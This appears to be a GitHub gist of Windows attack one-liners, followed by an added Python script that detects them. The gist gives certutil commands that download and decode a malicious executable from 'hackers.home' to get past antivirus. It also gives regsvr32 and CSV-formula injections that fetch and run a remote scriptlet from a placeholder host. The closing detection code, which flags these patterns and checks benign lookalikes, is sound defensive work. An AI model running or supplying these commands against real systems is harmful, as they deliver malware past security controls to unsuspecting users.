Last active: January 26, 2024 04:01
Gist: JonnyBanana/4ee05ddadd6370dbbefba706a5664ba0
# certutil.exe bypass av on download + base64 Decoding
# First, base64-encode the malicious file so that to an edge device it appears to be harmless text.
# Then, once the text file is downloaded, "certutil.exe -decode" turns the base64-encoded file
# back into the executable. https://www.browserling.com/tools/file-to-base64
# This is illustrated in Xavier Mertens' handler diary.
# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe
# certutil.exe bypass av on download - dll injection from regsvr32.exe
# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
certutil -urlcache -split -f [serverURL] file.blah
regsvr32.exe /s /u /I:file.blah scrub.dll
# csv malware injection
# https://xorl.wordpress.com/2017/12/11/microsoft-excel-csv-code-execution-injection-method/
fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''
=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''
regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll
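As an added detection-side example (not part of the gist), a small triage function that picks the certutil and regsvr32 patterns above out of process command lines; the sample events are constructed here, the first four mirroring the one-liners in the gist and the last two being benign lookalikes that a rule keyed on the binary name alone would misfire on.

```python
import re

# Constructed sample command lines in the shape a process-creation event
# (e.g. the Sysmon Event ID 1 CommandLine field) would carry.
SAMPLE_COMMAND_LINES = [
    'C:\\Windows\\System32\\certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt',
    "certutil.exe -decode bad.txt bad.exe",
    "regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll",
    "regsvr32.exe /s /u /I:file.blah scrub.dll",
    "certutil.exe -verify -urlfetch C:\\certs\\corp.cer",  # benign: chain check with AIA/CRL fetch
    "regsvr32.exe /s C:\\Vendor\\vendor.dll",              # benign: local COM DLL registration
]


def image_name(cmd: str) -> str:
    """Executable name from a command line: path stripped, lower-cased, no .exe suffix."""
    first = cmd.split()[0].strip('"')
    return first.rsplit("\\", 1)[-1].lower().removesuffix(".exe")


def classify(cmd: str) -> list[str]:
    """Return the rule names a single command line matches (empty list when none)."""
    toks = cmd.lower().split()
    hits = []
    if image_name(cmd) == "certutil":
        if "-urlcache" in toks and "-f" in toks:
            hits.append("certutil_urlcache_download")   # remote content written to disk via the cert cache
        if "-decode" in toks:
            hits.append("certutil_base64_decode")       # base64 text file turned back into a binary
    elif image_name(cmd) == "regsvr32":
        install = [t for t in toks if t.startswith("/i:")]
        if any(re.match(r"/i:https?://", t) for t in install):
            hits.append("regsvr32_remote_scriptlet")    # DllInstall argument is a URL
        if install and "/u" in toks:
            hits.append("regsvr32_dllinstall_uninstall")  # /u together with /i: is the scriptlet-loading combo
        if "scrobj.dll" in toks:
            hits.append("regsvr32_scrobj")              # scrobj.dll is the scriptlet host, not a normal COM server
    return hits


def triage(command_lines: list[str]) -> dict[str, list[str]]:
    """Map each flagged command line to its matched rules; benign lines are omitted."""
    return {cmd: hits for cmd in command_lines if (hits := classify(cmd))}


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_COMMAND_LINES).items():
        print(f"{', '.join(hits):60s} {cmd}")
```

The checks are token-based rather than substring-based so that flag order does not matter and so that `-urlfetch` is not mistaken for `-urlcache`.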